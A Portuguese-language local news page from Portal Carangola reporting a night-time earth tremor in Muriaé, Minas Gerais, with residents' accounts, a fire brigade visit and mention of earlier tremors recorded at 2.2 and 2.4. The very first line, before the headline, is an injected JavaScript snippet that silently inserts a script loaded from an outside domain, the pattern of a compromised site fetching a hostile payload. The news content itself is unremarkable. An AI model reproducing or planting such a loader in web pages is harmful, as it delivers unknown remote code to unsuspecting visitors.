;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Muriaé teve novo tremor de terra nesta madrugada, por volta das 00:15H. - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Muriaé teve novo tremor de terra nesta madrugada, por volta das 00:15H.

DESTA VEZ FOI RELATADO PELOS MURIAEENSES UM SÓ TREMOR

“Olha foi um tremor muito forte, e aqui por ser dois andares a casa, sente muito mais forte ainda. Parece que vai cair tudo, cheguei a levar susto, minha mãe acordou e achou que a cama dela estava caindo. Eu estava tomando banho e senti o chão tremer e ainda escutei um barulho, tomei aquele susto e logo fui pegando meus dois filhos, sai pra fora, pois é isso que estão pedindo; pra sair pra fora de casa”. relato de Fernanda, moradora do bairro União à nossa reportagem.

Moradores de Muriaé voltaram a ficar assustado com um novo tremor na cidade que ocorreu à 0h15 desta terça-feira, quando segundo relatos diversos e padronizados, vindos de vários bairros, davam conta sobre este evento. Os bairros que se destacavam naquele momento era a Barra, Napoleão, Cavalier, São José e Dornelas.

O fato ganhou as redes sociais e chegou também ao conhecimento da imprensa e das autoridades. O Corpo de Bombeiros recebeu muitas ligações e deu atenção às narrativas e a Defesa Civil de Muriaé, passou a ficar atenta.

Nossa reportagem acompanhou o Corpo de Bombeiros a uma visita ao bairro União, na Rua Teófilo Tostes minutos depois do tremor, e lá, o Sargento Agnaldo ouviu moradores, não havia relato de estragos, mas sim de muito susto. O relato é praticamente o mesmo em todos os bairros, alguns disseram que sentiram o tremor mais forte e outros um pouco mais fraco, dependendo da região e também do tipo de imóvel em que estavam.

Imagens de nossa reportagem logo após os relato de ocorrência do tremor de terra

VEJA MAIS ALGUNS RELATOS ENVIADOS PARA NOSSA REPORTAGEM LOGO APÓS O EVENTO

“Foi assustador, parecia que tinha caído algo dentro te casa levantei rápido pra olhar, mas estava tudo normal”, Adiel Martins de Abreu.

“Sou morador do bairro Napoleão e queria comunicar que por volta da 00:15 foi sentido um tremor na terra no bairro, várias pessoas sentiram o tremor”;

“Mas com a credibilidade do seu site gostaria que vc passasse mais informações sobre esse tremor, confiamos no seu trabalho, obrigado, hoje por volta da 00 teve de novo”;

“Tremor de terra foi sentido neste momento 00:10hs no Dornelas; Barra mais forte e no Primavera mais fraco”;

“Acabou de ter outro abalo fortíssimo. Tremeu demais a casa”;

“Boa noite. Outro tremor de terra aqui na Barra, tem 10 minutos”;

“Foi muito forte aqui na Barra, deu uma explosão”;

“Entrei no Face e deu em vários bairros”;

“Tremeu tudo aqui no Patrimônio São José”.

“Silvan Alves, sentimos tremores agora aqui na Cavalier forte. E lá no Patrimônio também, porque minha tia mora lá e mandou mensagem. Meu Deus o que será isso?”.

“Boa noite, relata aí no seu site, houve outro tremor de terra aqui na Barra agora a pouco. Não e brincadeira, se estiver algum conhecido que mora próximo o Colégio Olavo Tostes, pergunta aí. Tremeu tudo 00:15 mais ou menos”.

“Cardoso de Melo eu ouvi um estrondo e senti o tremor”.

No dia 21 de fevereiro em uma sexta-feira, ocorreram dois tremores em Muriaé, um às 15h20 e outro 16h08, os quais chegaram a ser registrados pelo Laboratório Sismológico da Universidade de Brasília (UnB), dando conta que tinham chegado a 2,2 e 2,4 graus na Escala Richter.

Fonte: Site Silvan Alves/João Santana

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.